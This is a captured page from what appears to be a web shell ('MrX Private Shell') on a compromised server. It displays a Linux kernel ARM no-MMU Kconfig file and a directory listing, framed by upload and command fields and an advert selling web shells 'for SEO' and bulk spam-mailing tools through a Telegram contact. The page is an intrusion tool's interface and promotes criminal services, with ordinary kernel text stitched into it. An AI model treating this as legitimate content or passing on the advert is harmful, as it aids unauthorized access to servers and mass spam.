__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
# SPDX-License-Identifier: GPL-2.0
#
# Kconfig for uClinux(non-paged MM) depend configurations
# Hyok S. Choi <[email protected]>
# 

config SET_MEM_PARAM
	bool "Set flash/sdram size and base addr"
	help
	 Say Y to manually set the base addresses and sizes.
	 otherwise, the default values are assigned.

config DRAM_BASE
	hex '(S)DRAM Base Address' if SET_MEM_PARAM
	default 0x00800000

config DRAM_SIZE
	hex '(S)DRAM SIZE' if SET_MEM_PARAM
	default 0x00800000

config FLASH_MEM_BASE
	hex 'FLASH Base Address' if SET_MEM_PARAM
	depends on CPU_ARM740T || CPU_ARM946E || CPU_ARM940T
	default 0x00400000

config FLASH_SIZE
	hex 'FLASH Size' if SET_MEM_PARAM
	depends on CPU_ARM740T || CPU_ARM946E || CPU_ARM940T
	default 0x00400000

config PROCESSOR_ID
	hex 'Hard wire the processor ID'
	default 0x00007700
	depends on !(CPU_CP15 || CPU_V7M)
	help
	  If processor has no CP15 register, this processor ID is
	  used instead of the auto-probing which utilizes the register.

config REMAP_VECTORS_TO_RAM
	bool 'Install vectors to the beginning of RAM'
	help
	  The kernel needs to change the hardware exception vectors.
	  In nommu mode, the hardware exception vectors are normally
	  placed at address 0x00000000. However, this region may be
	  occupied by read-only memory depending on H/W design.

	  If the region contains read-write memory, say 'n' here.

	  If your CPU provides a remap facility which allows the exception
	  vectors to be mapped to writable memory, say 'n' here.

	  Otherwise, say 'y' here.  In this case, the kernel will require
	  external support to redirect the hardware exception vectors to
	  the writable versions located at DRAM_BASE.

config ARM_MPU
       bool 'Use the ARM v7 PMSA Compliant MPU'
       depends on CPU_V7 || CPU_V7M
       default y if CPU_V7
       help
         Some ARM systems without an MMU have instead a Memory Protection
         Unit (MPU) that defines the type and permissions for regions of
         memory.

         If your CPU has an MPU then you should choose 'y' here unless you
         know that you do not want to use the MPU.

Filemanager

Name Type Size Permission Actions
boot Folder 0755
common Folder 0755
crypto Folder 0755
include Folder 0755
kernel Folder 0755
lib Folder 0755
mach-actions Folder 0755
mach-alpine Folder 0755
mach-artpec Folder 0755
mach-aspeed Folder 0755
mach-at91 Folder 0755
mach-axxia Folder 0755
mach-bcm Folder 0755
mach-berlin Folder 0755
mach-clps711x Folder 0755
mach-davinci Folder 0755
mach-digicolor Folder 0755
mach-dove Folder 0755
mach-ep93xx Folder 0755
mach-exynos Folder 0755
mach-footbridge Folder 0755
mach-gemini Folder 0755
mach-highbank Folder 0755
mach-hisi Folder 0755
mach-hpe Folder 0755
mach-imx Folder 0755
mach-ixp4xx Folder 0755
mach-keystone Folder 0755
mach-lpc18xx Folder 0755
mach-lpc32xx Folder 0755
mach-mediatek Folder 0755
mach-meson Folder 0755
mach-milbeaut Folder 0755
mach-mmp Folder 0755
mach-mstar Folder 0755
mach-mv78xx0 Folder 0755
mach-mvebu Folder 0755
mach-mxs Folder 0755
mach-nomadik Folder 0755
mach-npcm Folder 0755
mach-omap1 Folder 0755
mach-omap2 Folder 0755
mach-orion5x Folder 0755
mach-pxa Folder 0755
mach-qcom Folder 0755
mach-realtek Folder 0755
mach-rockchip Folder 0755
mach-rpc Folder 0755
mach-s3c Folder 0755
mach-s5pv210 Folder 0755
mach-sa1100 Folder 0755
mach-shmobile Folder 0755
mach-socfpga Folder 0755
mach-spear Folder 0755
mach-sti Folder 0755
mach-stm32 Folder 0755
mach-sunxi Folder 0755
mach-tegra Folder 0755
mach-ux500 Folder 0755
mach-versatile Folder 0755
mach-vt8500 Folder 0755
mach-zynq Folder 0755
mm Folder 0755
net Folder 0755
nwfpe Folder 0755
plat-orion Folder 0755
probes Folder 0755
tools Folder 0755
vdso Folder 0755
vfp Folder 0755
xen Folder 0755
Kbuild File 396 B 0644
Kconfig File 58.18 KB 0644
Kconfig-nommu File 2.05 KB 0644
Kconfig.debug File 61.22 KB 0644
Kconfig.platforms File 4.49 KB 0644
Makefile File 11.57 KB 0644
Filemanager